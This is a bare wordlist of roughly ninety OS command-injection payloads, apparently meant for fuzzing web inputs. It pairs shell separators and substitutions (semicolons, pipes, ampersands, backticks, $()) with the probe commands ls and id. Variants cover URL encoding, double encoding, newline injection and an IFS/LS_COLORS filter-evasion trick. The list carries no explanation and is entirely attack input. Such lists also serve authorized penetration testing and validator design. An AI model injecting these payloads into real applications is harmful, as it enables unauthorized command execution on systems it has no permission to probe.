;
;ls
&ls
&&ls
&
&&
|
|ls
||ls
||
``
`ls`
$()
$(ls)
$(id)
`id`
||id
|id
&&id
&id
;id
'
'ls
'id
''id
$@
$@ls
 \
 \id
 \ls
$@id
${LS_COLORS:10:1}${IFS}id
>
<
0x0als
0x0aid
`
`ls
`id
%0a
%0als
%0aid
%26
%26ls
%26id
%7c
%7cid
%7cls
%26%26
%26%26ls
%26%26id
%7c%7c
%7c%7cls
%7c%7cid
%60%60
%60%60ls
%60%60id
%24%28%29
%24%28%29ls
%24%28%29id
%3B
%3Bls
%3Bid
%7C
%7Cls
%7Cid
%7C%7C
%7C%7Cls
%7C%7Cid
%24%28id%29
%C3%ACd%60
%27
%27id
%27%27id
%24%40
%20%5C
%24%40id
%24%7BLS_COLORS%3A10%3A1%7D%24%7BIFS%7Did
%3E
%3C
0x0a
%60
%60id
%250a
%2526
%257c
%2526%2526
%257c%257c
%2560%2560
%2524%2528%2529